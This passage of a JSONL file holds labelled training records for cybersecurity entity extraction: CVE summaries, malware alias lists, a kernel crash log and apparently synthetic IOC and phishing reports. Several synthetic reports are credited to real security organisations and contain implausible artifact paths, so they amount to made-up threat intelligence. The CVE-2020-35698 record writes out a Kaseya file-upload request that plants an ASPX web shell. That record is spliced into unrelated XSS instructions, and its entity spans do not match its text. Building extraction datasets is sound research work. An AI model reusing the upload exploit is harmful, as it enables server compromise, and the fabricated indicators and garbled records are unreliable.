]dll ) used by BRONZE PRESIDENT to install RCSession : 0617cad9e5d559356c43d4037c86227f , f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c , 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740 .", "spans": {"Indicator: goopdate.dll": [[20, 36]], "Malware: RCSession": [[75, 84]], "Indicator: 0617cad9e5d559356c43d4037c86227f": [[87, 119]], "Indicator: f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c": [[122, 162]], "Indicator: 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740": [[165, 229]]}, "info": {"id": "cyberner_stix_train_003372", "source": "defanged_augment"}} {"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at /var/tmp/lsass.dmp - SHA256: a6a404e3771fd33d7830cb47b7455502802b681bbd45021791f5ea6f937c54b4\nStage 2 loader at C:\\ProgramData\\helper.sh - SHA256: 533cc53d308ed07bf7cd542aa464f36d7ec9c385c642090a3fc25591e692278e\nFinal payload at C:\\Windows\\Temp\\chrome_helper.exe - SHA256: af96a03902d3eb56d9b0a349c414bdcfe24dc4b9b83df0e5a9b9d85ff41a1ba6\nExfiltration module - SHA1: 77022c34bdbe34e159aa3bf97fcd1495c6c3cbb8\nAll stages communicated with 71[.]55[.]246[.]41. 
Burp Suite signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: a6a404e3771fd33d7830cb47b7455502802b681bbd45021791f5ea6f937c54b4": [[91, 155]], "Indicator: 533cc53d308ed07bf7cd542aa464f36d7ec9c385c642090a3fc25591e692278e": [[209, 273]], "Indicator: af96a03902d3eb56d9b0a349c414bdcfe24dc4b9b83df0e5a9b9d85ff41a1ba6": [[335, 399]], "Indicator: 77022c34bdbe34e159aa3bf97fcd1495c6c3cbb8": [[428, 468]], "Indicator: 71.55.246.41": [[498, 516]]}, "info": {"id": "synth_v2_01959", "source": "defanged_augment"}} {"text": "The output in Figure 3 shows the Process ID ( PID ) of the csrss[.]exe process to be 716 .", "spans": {"Indicator: csrss.exe": [[59, 70]]}, "info": {"id": "cyberner_stix_train_002400", "source": "defanged_augment"}} {"text": "Due to this feature , it is clear that the developers paid special attention to the work of the implant on Huawei devices . Despite this shift in toolset , the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic[ . ]net . Axiom : Group72 .", "spans": {"Organization: Huawei": [[107, 113]], "Indicator: Atlantic.net": [[283, 299]]}, "info": {"id": "cyberner_stix_train_002018", "source": "defanged_augment"}} {"text": "Artifact Analysis for Gootloader campaign:\nStage 1 dropper at /home/user/.config/ntds.dit - SHA256: eb04273bb24b8b6f3a7cad6c3f1b6be66c4b120eaf11f6a2b19f2fc78e1c09c2\nStage 2 loader at /opt/app/bin/chrome_helper.exe - SHA1: 47044f5fbfa47a02d2b519907948086fdee0c8ad\nFinal payload at C:\\Users\\admin\\AppData\\Local\\Temp\\runtime.dll - SHA1: 78d87995bcbe3dc0b4878cabcde7dee9f7fc9773\nExfiltration module - SHA1: 30241c274b04dbf8e895ba42dfb799c0b4033895\nAll stages communicated with 10[.]70[.]150[.]23. 
Certutil signatures detected in Stage 2.", "spans": {"Malware: Gootloader": [[22, 32]], "Indicator: eb04273bb24b8b6f3a7cad6c3f1b6be66c4b120eaf11f6a2b19f2fc78e1c09c2": [[100, 164]], "Indicator: 47044f5fbfa47a02d2b519907948086fdee0c8ad": [[222, 262]], "Indicator: 78d87995bcbe3dc0b4878cabcde7dee9f7fc9773": [[334, 374]], "Indicator: 30241c274b04dbf8e895ba42dfb799c0b4033895": [[403, 443]], "Indicator: 10.70.150.23": [[473, 491]]}, "info": {"id": "synth_v2_01878", "source": "defanged_augment"}} {"text": "Artifact Analysis for LockBit campaign:\nStage 1 dropper at C:\\ProgramData\\chrome_helper.exe - SHA256: 4b470fb6baf78ea21eb9df9fd471012356651922573981ab648bc6e665648d37\nStage 2 loader at C:\\Program Files\\Common Files\\helper.sh - MD5: b4ac4aa6462340e3c6fd4d04a336da2e\nFinal payload at C:\\Users\\admin\\Downloads\\dropper.ps1 - SHA1: 60b666c2373e7b0962c721ba025575037d0d8434\nExfiltration module - MD5: 9e0b7c9dd95280119273c4f9f61178c3\nAll stages communicated with 172 [ . ] 57 [ . ] 195 [ . ] 66. LinPEAS signatures detected in Stage 2.", "spans": {"Malware: LockBit": [[22, 29]], "Indicator: 4b470fb6baf78ea21eb9df9fd471012356651922573981ab648bc6e665648d37": [[102, 166]], "Indicator: b4ac4aa6462340e3c6fd4d04a336da2e": [[232, 264]], "Indicator: 60b666c2373e7b0962c721ba025575037d0d8434": [[327, 367]], "Indicator: 9e0b7c9dd95280119273c4f9f61178c3": [[395, 427]], "Indicator: 172.57.195.66": [[457, 488]]}, "info": {"id": "synth_v2_01968", "source": "defanged_augment"}} {"text": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. 
Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192 [ . ] 168 [ . ] 1 [ . ] 194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %> <%@ Import namespace=\"System.Web.UI.WebControls\" %> <%@ Import namespace=\"System.Diagnostics\" %> <%@ Import namespace=\"System[ . ]IO\" %> <%@ Import namespace=\"System\" %> <%@ Import namespace=\"System.Data\" %> <%@ Import namespace=\"System.Data.SqlClient\" %> <%@ Import namespace=\"System.Security.AccessControl\" %> <%@ Import namespace=\"System.Security.Principal\" %> <%@ Import namespace=\"System.Collections.Generic\" %> <%@ Import namespace=\"System.Collections\" %> Step 6 : Choose any domains from google for any website this exploit will work on all the websites as it is a code based flaw in the CMS Step 7 : Thousands of websites are vulnerable due to this vulnerable code in the CMS itself which is giving rise to the XSS attack.", "spans": {"Indicator: https://hacktify.thinkific.com/account/billing?success=%E2%80%AA%3Cscript%3Ealert(1": [[381, 472]], "Indicator: Google.com": [[772, 784]], "Indicator: thinkific.com": [[820, 835]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-35698"}} {"text": "Forensic examination of the compromised host identified NjRAT artifacts. The primary payload was located at C:\\Windows\\System32\\config\\SAM with SHA256 hash 7a8cc24b994c7c318704dd8d3bbb571c714ac7eea8d5784c53b4b995c95073ea. A secondary implant was found at /dev/shm/.payload (MD5: 1bafa6cfe9b2fe395dd1ca0684cc9557). Network logs showed outbound connections to 141 [ . ] 177 [ . ] 122 [ . ] 166 and DNS queries to ransom-pay[[ . 
]]icu.", "spans": {"Malware: NjRAT": [[56, 61]], "Indicator: 7a8cc24b994c7c318704dd8d3bbb571c714ac7eea8d5784c53b4b995c95073ea": [[156, 220]], "Indicator: 1bafa6cfe9b2fe395dd1ca0684cc9557": [[279, 311]], "Indicator: 141.177.122.166": [[358, 391]], "Indicator: ransom-pay[.]icu": [[411, 431]]}, "info": {"id": "synth_00096", "source": "defanged_augment"}} {"text": "Blog Post by Microsoft MSRC: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-20463 against Zyxel USG deployments. The initial access vector involves spear-phishing emails from notification@identity-verify[ . ]cc delivering DanaBot. Post-compromise, the attackers deploy Meduza Stealer and use SharpHound for reconnaissance. C2 infrastructure includes 222 [ . ] 254 [ . ] 7 [ . ] 136 and gatewayrelay[ . ]tech. A staging server at hxxp://update-mail[.]live/assets/js/payload.js hosts additional tooling. Key artifact: /dev/shm/update.dll (SHA256: 615657959884cd350ee3b767ed1cbcced1ce83b64d7ac74c788d8ecbd2f278b4).", "spans": {"Organization: Microsoft MSRC": [[13, 27]], "Vulnerability: CVE-2021-20463": [[134, 148]], "System: Zyxel USG": [[157, 166]], "Indicator: notification@identity-verify.cc": [[242, 277]], "Malware: DanaBot": [[289, 296]], "Malware: Meduza Stealer": [[336, 350]], "Indicator: 222.254.7.136": [[417, 448]], "Indicator: gatewayrelay.tech": [[453, 474]], "Indicator: http://update-mail.live/assets/js/payload.js": [[496, 542]], "Indicator: 615657959884cd350ee3b767ed1cbcced1ce83b64d7ac74c788d8ecbd2f278b4": [[612, 676]]}, "info": {"id": "synth_v2_01617", "source": "defanged_augment"}} {"text": "Description:\n\nVMware AVI Load Balancer contains an authenticated blind SQL Injection vulnerability. VMware has evaluated the severity of the issue to be in the Moderate severity range hxxps://www[ . ]broadcom[ . 
]com/support/vmware-services/security-response  with a maximum CVSSv3 base score of 6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N .\n\nKnown Attack Vectors:\n\nAn authenticated malicious user with network access may be able to use specially crafted SQL queries to gain database access.\n\nResolution:\n\nTo remediate CVE-2025-41233 apply the patches to the Avi Controller listed in the 'Fixed Version' column of the 'Response Matrix' found below.\n\nWorkarounds:\n\nNone.\n\nAdditional Documentation:\n\nNone.\n\nAcknowledgements:\n\nVMware would like to thank Alexandru Copaceanu hxxps://www[ . ]linkedin[ . ]com/in/alexandru-copaceanu-b39aaa1a8/  for reporting this issue to us.\n\nNotes:\n\nNone.\n\n \n\nResponse Matrix:\n\nProductVersionRunning OnCVECVSSv4SeverityFixed VersionWorkaroundsAdditional DocumentsVMware Avi Load Balancer30.1.1AnyCVE-2025-41233 6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.1.2-2p3 hxxps://techdocs[.]broadcom[.]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html NoneNoneVMware Avi Load Balancer30.1.2AnyCVE-2025-41233 6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.1.2-2p3 hxxps://techdocs[.]broadcom[.]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html NoneNoneVMware Avi Load Balancer30.2.1AnyCVE-2025-41233 6.8 hxxps://www[.]first[.]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.2.1-2p6 hxxps://techdocs[ . ]broadcom[ . 
]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-1.html NoneNoneVMware Avi Load Balancer30.2.2AnyCVE-2025-41233 6.8 hxxps://www[ . ]first[ . ]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 30.2.2-2p5 hxxps://techdocs[ . ]broadcom[ . ]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-2.html NoneNoneVMware Avi Load Balancer30.2.3AnyCVE-2025-41233N/AN/AUnaffectedNoneNoneVMware Avi Load Balancer31.1.1AnyCVE-2025-41233 6.8 hxxps://www[ . ]first[ . ]org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N Moderate 31.1.1-2p2 hxxps://techdocs[ . ]broadcom[ . ]com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/31-1/vmware-avi-load-balancer-release-notes/Release-Note-Section-20627.html NoneNone\n\nCWE-89 in the Avi Load Balancer component of VMware allows an authenticated attacker to execute blind SQL injections in versions 30.1.1, 30.1.2, 30.2.1, and 30.2.2 due to improper input validation, enabling unauthorized database access.", "spans": {"Vulnerability: CVE-2025-41233": [[572, 586], [1080, 1094], [1428, 1442], [1776, 1790], [2158, 2172], [2544, 2558], [2615, 2629]], "Indicator: https://www.broadcom.com/support/vmware-services/security-response": [[185, 259]], "Indicator: https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N": [[302, 392], [1099, 1189], [1447, 1537], [1795, 1885], [2177, 2271], [2634, 2728]], "Indicator: https://www.linkedin.com/in/alexandru-copaceanu-b39aaa1a8/": [[825, 891]], "Indicator: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-1/vmware-avi-load-balancer-release-notes/release-notes-30-1-2.html": [[1210, 1386], [1558, 1734]], "Indicator: 
https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-1.html": [[1906, 2116]], "Indicator: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/30-2/vmware-avi-load-balancer-release-notes/release-notes-for-avi-load-balancer-version-30-2-2.html": [[2292, 2502]], "Indicator: https://techdocs.broadcom.com/us/en/vmware-security-load-balancing/avi-load-balancer/avi-load-balancer/31-1/vmware-avi-load-balancer-release-notes/Release-Note-Section-20627.html": [[2749, 2935]], "Organization: VMware": [[14, 20], [100, 106], [777, 783], [2991, 2997]], "Vulnerability: improper input validation": [[3117, 3142]], "Vulnerability: SQL Injection": [[71, 84]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-41233"}} {"text": "A backdoor also known as: W32.HfsAutoB.186B Worm.Dorkbot.A Backdoor.W32.Padodor.kZnr Trojan/Spy.qukart Win32.Trojan-Spy.Quart.a Backdoor.Berbew!g1 Win32/Webber.W Win32.Qukart BKDR_BERBEW.SMA Win.Trojan.Crypted-36 Trojan-Proxy.Win32.Qukart.vjh Trojan.Win32.Qukart.etuxeg Worm.Win32.Qukart.K BackDoor.HangUp.43784 BKDR_BERBEW.SMA BehavesLike[ . ]Win32[ . ]Backdoor[ . ]cc Trojan.Win32.Senta TrojanProxy.Qukart.tsk Trojan-Proxy.Win32.Qukart.vjh Win-Trojan/Berbew.51712 TrojanProxy.Qukart Trojan-Ransom.Win32.Pornoasset.a", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[328, 369]]}, "info": {"id": "cyner2_train_000262", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Get user_ns from in_skb in unix_diag_get_exact().\n\nWei Chen reported a NULL deref in sk_user_ns() [0][1], and Paolo diagnosed\nthe root cause: in unix_diag_get_exact(), the newly allocated skb does not\nhave sk. 
[2]\n\nWe must get the user_ns from the NETLINK_CB(in_skb).sk and pass it to\nsk_diag_fill().\n\n[0]:\nBUG: kernel NULL pointer dereference, address: 0000000000000270\n#PF: supervisor read access in kernel mode\n#PF: error_code(0x0000) - not-present page\nPGD 12bbce067 P4D 12bbce067 PUD 12bc40067 PMD 0\nOops: 0000 [#1] PREEMPT SMP\nCPU: 0 PID: 27942 Comm: syz-executor.0 Not tainted 6.1.0-rc5-next-20221118 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1[ . ]13[ . ]0-48-gd9c812dda519-prebuilt[ . ]qemu[ . ]org 04/01/2014\nRIP: 0010:sk_user_ns include/net/sock.h:920 [inline]\nRIP: 0010:sk_diag_dump_uid net/unix/diag.c:119 [inline]\nRIP: 0010:sk_diag_fill+0x77d/0x890 net/unix/diag.c:170\nCode: 89 ef e8 66 d4 2d fd c7 44 24 40 00 00 00 00 49 8d 7c 24 18 e8\n54 d7 2d fd 49 8b 5c 24 18 48 8d bb 70 02 00 00 e8 43 d7 2d fd <48> 8b\n9b 70 02 00 00 48 8d 7b 10 e8 33 d7 2d fd 48 8b 5b 10 48 8d\nRSP: 0018:ffffc90000d67968 EFLAGS: 00010246\nRAX: ffff88812badaa48 RBX: 0000000000000000 RCX: ffffffff840d481d\nRDX: 0000000000000465 RSI: 0000000000000000 RDI: 0000000000000270\nRBP: ffffc90000d679a8 R08: 0000000000000277 R09: 0000000000000000\nR10: 0001ffffffffffff R11: 0001c90000d679a8 R12: ffff88812ac03800\nR13: ffff88812c87c400 R14: ffff88812ae42210 R15: ffff888103026940\nFS: 00007f08b4e6f700(0000) GS:ffff88813bc00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000270 CR3: 000000012c58b000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \n unix_diag_get_exact net/unix/diag.c:285 [inline]\n unix_diag_handler_dump+0x3f9/0x500 net/unix/diag.c:317\n __sock_diag_cmd net/core/sock_diag.c:235 [inline]\n sock_diag_rcv_msg+0x237/0x250 net/core/sock_diag.c:266\n netlink_rcv_skb+0x13e/0x250 net/netlink/af_netlink.c:2564\n sock_diag_rcv+0x24/0x40 net/core/sock_diag.c:277\n netlink_unicast_kernel 
net/netlink/af_netlink.c:1330 [inline]\n netlink_unicast+0x5e9/0x6b0 net/netlink/af_netlink.c:1356\n netlink_sendmsg+0x739/0x860 net/netlink/af_netlink.c:1932\n sock_sendmsg_nosec net/socket.c:714 [inline]\n sock_sendmsg net/socket.c:734 [inline]\n ____sys_sendmsg+0x38f/0x500 net/socket.c:2476\n ___sys_sendmsg net/socket.c:2530 [inline]\n __sys_sendmsg+0x197/0x230 net/socket.c:2559\n __do_sys_sendmsg net/socket.c:2568 [inline]\n __se_sys_sendmsg net/socket.c:2566 [inline]\n __x64_sys_sendmsg+0x42/0x50 net/socket.c:2566\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x2b/0x70 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x4697f9\nCode: f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 48 89 f8 48\n89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d\n01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f08b4e6ec48 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 000000000077bf80 RCX: 00000000004697f9\nRDX: 0000000000000000 RSI: 00000000200001c0 RDI: 0000000000000003\nRBP: 00000000004d29e9 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 000000000077bf80\nR13: 0000000000000000 R14: 000000000077bf80 R15: 00007ffdb36bc6c0\n \nModules linked in:\nCR2: 0000000000000270\n\n[1]: hxxps://lore[.]kernel[.]org/netdev/CAO4mrfdvyjFpokhNsiwZiP-wpdSD0AStcJwfKcKQdAALQ9_2Qw@mail.gmail.com/\n[2]: hxxps://lore[.]kernel[.]org/netdev/e04315e7c90d9a75613f3993c2baf2d344eef7eb.camel@redhat.com/", "spans": {"Indicator: https://lore.kernel.org/netdev/CAO4mrfdvyjFpokhNsiwZiP-wpdSD0AStcJwfKcKQdAALQ9_2Qw@mail.gmail.com/": [[3588, 3690]], "Indicator: https://lore.kernel.org/netdev/e04315e7c90d9a75613f3993c2baf2d344eef7eb.camel@redhat.com/": [[3696, 3789]], "Indicator: rel-1.13.0-48-gd9c812dda519-prebuilt.qemu.org": [[749, 810]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[704, 708]], "Vulnerability: NULL pointer 
dereference": [[397, 421]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-48970"}} {"text": "A backdoor also known as: Trojan.VBKrypt Spyware.Pony Downloader.Ponik TSPY_HPFAREIT.SMB Trojan.Win32.VBKrypt.ymio Trojan.Win32.VBKrypt.evkxoj Trojan.VBKrypt.Win32.291698 BehavesLike[ . ]Win32[ . ]Fareit[ . ]ch Trojan.VBKrypt.cgbs TR/Dropper.VB.ocnhj Trojan.Win32.VBKrypt.ymio Trojan/Win32.VBKrypt.R213345 Trojan.VBKrypt Trj/GdSda.A Win32.Trojan.Vbkrypt.Amwf Trojan.VBKrypt!wORN5qK9fN4 Trojan.VB.Crypt W32/FareitVB.BEOK!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Fareit.ch": [[171, 210]]}, "info": {"id": "cyner2_train_005192", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.HackerAu3.Worm Win32.Worm.Autoit.Q Backdoor.Win32.Shark.axz!O Worm.Autoit.i Win32.Worm.Autoit.Q Worm.AutoIt.Win32.2 W32/AutoRun.fjx WORM_UTOTI.RC Win32[ . ]Worm[ . ]Sohanad[ . ]br W32/Downloader.AEEC-3989 W32.SillyDC Win32/Vishawon.A WORM_UTOTI.RC Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan.Script.AutoIt.delira Worm.Win32.Autorun.215552.B Win32.Virus.Alman.Svhc Win32.Worm.Autoit.Q Worm.Win32.AutoIt.~MT Win32.HLLW.Autoruner.1483 W32/Downldr2.AICJ Worm/AutoRun.jsl W32/Almanahe.C Win32.Worm.Autoit.Q W32.W.AutoRun.lbrr Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan/Win32.AutoRun.C97057 Worm.AutoRun.FLD I-Worm.Autoit.AC Win32/Autoit.BA Worm.AutoIT.V Worm.Win32.AutoIt W32/AutoIt.I!worm Win32/Worm.c3b", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Win32.Worm.Sohanad.br": [[176, 209]]}, "info": {"id": "cyner2_train_006442", "source": "defanged_augment"}} {"text": "A stored cross-site scripting (XSS) issue in Envira Gallery Lite before 1[.]8[.]3[.]3 allows remote attackers to inject arbitrary JavaScript/HTML code via a POST /wp-admin/admin-ajax.php request with the meta[title] parameter.", "spans": {"Indicator: 1.8.3.3": [[72, 85]], "Vulnerability: cross-site scripting": [[9, 29]]}, "info": {"source": "defanged_augment", "cve_id": 
"CVE-2020-35581"}} {"text": "IOC Bulletin - StealC Campaign:\nNetwork Indicators:\n- 10 [ . ] 29 [ . ] 133 [ . ] 205\n- 192[.]51[.]237[.]114\n- 172 [ . ] 206 [ . ] 82 [ . ] 73\n- updatebackup[ . ]live\n- auth-cloud[.]com\nURLs:\n- hxxp://backupdata[.]org/api/v2/auth\n- hxxps://mailportal[ . ]live/api/v2/auth\nEmail Senders:\n- account@secure-verify[ . ]net\n- security@credential-check[ . ]site\nFile Indicators:\n- SHA256: 2cd488bb63a988ae9c8c029834e01204e97499b657da48bc01dd61a44aab7683\n- SHA1: 0fdaa964028c5ef9893258ca8e6687d66245a61b\n- Drop path: /etc/cron.d/implant.so", "spans": {"Malware: StealC": [[15, 21]], "Indicator: 10.29.133.205": [[54, 85]], "Indicator: 192.51.237.114": [[88, 108]], "Indicator: 172.206.82.73": [[111, 142]], "Indicator: updatebackup.live": [[145, 166]], "Indicator: auth-cloud.com": [[169, 185]], "Indicator: hxxp://backupdata.org/api/v2/auth": [[194, 229]], "Indicator: https://mailportal.live/api/v2/auth": [[232, 271]], "Indicator: account@secure-verify.net": [[289, 318]], "Indicator: security@credential-check.site": [[321, 355]], "Indicator: 2cd488bb63a988ae9c8c029834e01204e97499b657da48bc01dd61a44aab7683": [[383, 447]], "Indicator: 0fdaa964028c5ef9893258ca8e6687d66245a61b": [[456, 496]]}, "info": {"id": "synth_v2_01399", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Dragos identified a large-scale phishing operation. Emails originated from noreply@urgent-notice[.]online and admin@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxps://backup-auth[ . ]cc/assets/js/payload.js which hosted a credential harvesting page on sync-backup[ . ]online. A secondary link hxxps://databackup[ . ]net/download/update.exe delivered Latrodectus (MD5: 0f175b09deb346d508073b6526611520). The malware was saved to /home/user/.config/payload.bin and established C2 with 10 [ . ] 43 [ . ] 114 [ . 
] 6.", "spans": {"Organization: Dragos": [[26, 32]], "Indicator: noreply@urgent-notice.online": [[101, 131]], "Indicator: admin@secure-verify.net": [[136, 163]], "Indicator: https://backup-auth.cc/assets/js/payload.js": [[220, 267]], "Indicator: sync-backup.online": [[313, 335]], "Indicator: https://databackup.net/download/update.exe": [[354, 400]], "Malware: Latrodectus": [[411, 422]], "Indicator: 0f175b09deb346d508073b6526611520": [[429, 461]], "Indicator: 10.43.114.6": [[544, 573]]}, "info": {"id": "synth_v2_01061", "source": "defanged_augment"}} {"text": "Cargo is a package manager for the rust programming language. After a package is downloaded, Cargo extracts its source code in the ~/.cargo folder on disk, making it available to the Rust projects it builds. To record when an extraction is successful, Cargo writes \"ok\" to the .cargo-ok file at the root of the extracted source code once it extracted all the files. It was discovered that Cargo allowed packages to contain a .cargo-ok symbolic link, which Cargo would extract. Then, when Cargo attempted to write \"ok\" into .cargo-ok, it would actually replace the first two bytes of the file the symlink pointed to with ok. This would allow an attacker to corrupt one file on the machine using Cargo to extract the package. Note that by design Cargo allows code execution at build time, due to build scripts and procedural macros. The vulnerabilities in this advisory allow performing a subset of the possible damage in a harder to track down way. Your dependencies must still be trusted if you want to be protected from attacks, as it's possible to perform the same attacks with build scripts and procedural macros. The vulnerability is present in all versions of Cargo. Rust 1.64, to be released on September 22nd, will include a fix for it. 
Since the vulnerability is just a more limited way to accomplish what a malicious build scripts or procedural macros can do, we decided not to publish Rust point releases backporting the security fix. Patch files are available for Rust 1.63.0 are available in the wg-security-response repository for people building their own toolchain.\nMitigations We recommend users of alternate registries to exercise care in which package they download, by only including trusted dependencies in their projects. Please note that even with these vulnerabilities fixed, by design Cargo allows arbitrary code execution at build time thanks to build scripts and procedural macros: a malicious dependency will be able to cause damage regardless of these vulnerabilities. crates[.]io implemented server-side checks to reject these kinds of packages years ago, and there are no packages on crates[.]io exploiting these vulnerabilities. crates[.]io users still need to exercise care in choosing their dependencies though, as remote code execution is allowed by design there as well.", "spans": {"Indicator: crates.io": [[1997, 2008], [2114, 2125], [2160, 2171]], "Vulnerability: remote code execution": [[2248, 2269]], "Vulnerability: code execution": [[757, 771], [1832, 1846]], "Vulnerability: symlink": [[596, 603]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-36113"}} {"text": "Phishing Campaign Report: CISA identified a large-scale phishing operation. Emails originated from alert@urgent-notice[ . ]online and ceo@credential-check[ . ]site, spoofing legitimate services. Victims were directed to hxxps://staticapi[ . ]online/login which hosted a credential harvesting page on staticapi[ . ]info. A secondary link hxxps://cdnnode[ . ]live/secure/token delivered PlugX (MD5: 6614f59fa687faa7ddd8cf4afbf1e59b). 
The malware was saved to /usr/local/bin/beacon.dll and established C2 with 172[.]109[.]182[.]198.", "spans": {"Organization: CISA": [[26, 30]], "Indicator: alert@urgent-notice.online": [[99, 129]], "Indicator: ceo@credential-check.site": [[134, 163]], "Indicator: hxxps://staticapi.online/login": [[220, 254]], "Indicator: staticapi.info": [[300, 318]], "Indicator: hxxps://cdnnode.live/secure/token": [[337, 374]], "Malware: PlugX": [[385, 390]], "Indicator: 6614f59fa687faa7ddd8cf4afbf1e59b": [[397, 429]], "Indicator: 172.109.182.198": [[507, 528]]}, "info": {"id": "synth_v2_00885", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from verify@account-update[.]xyz and helpdesk@mail-service[ . ]info, spoofing legitimate services. Victims were directed to hxxp://gatewaystorage[.]link/panel/index.html which hosted a credential harvesting page on backupedge[ . ]tech. A secondary link hxxps://cachesync[ . ]online/download/update.exe delivered Play (SHA256: 65d18eb1c2f37aff3af81ac0355b74658e21a7362383bed1532995d3f68fe96f). The malware was saved to C:\\Program Files\\Common Files\\dropper.ps1 and established C2 with 172 [ . ] 239 [ . ] 88 [ . ] 51.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: verify@account-update.xyz": [[105, 132]], "Indicator: helpdesk@mail-service.info": [[137, 167]], "Indicator: hxxp://gatewaystorage.link/panel/index.html": [[224, 269]], "Indicator: backupedge.tech": [[315, 334]], "Indicator: hxxps://cachesync.online/download/update.exe": [[353, 401]], "Malware: Play": [[412, 416]], "Indicator: 65d18eb1c2f37aff3af81ac0355b74658e21a7362383bed1532995d3f68fe96f": [[426, 490]], "Indicator: 172.239.88.51": [[584, 615]]}, "info": {"id": "synth_v2_00961", "source": "defanged_augment"}} {"text": "Malware Analysis Report: WarmCookie (MD5: 8e7d05464f9b5f901edcc20575df2b85). 
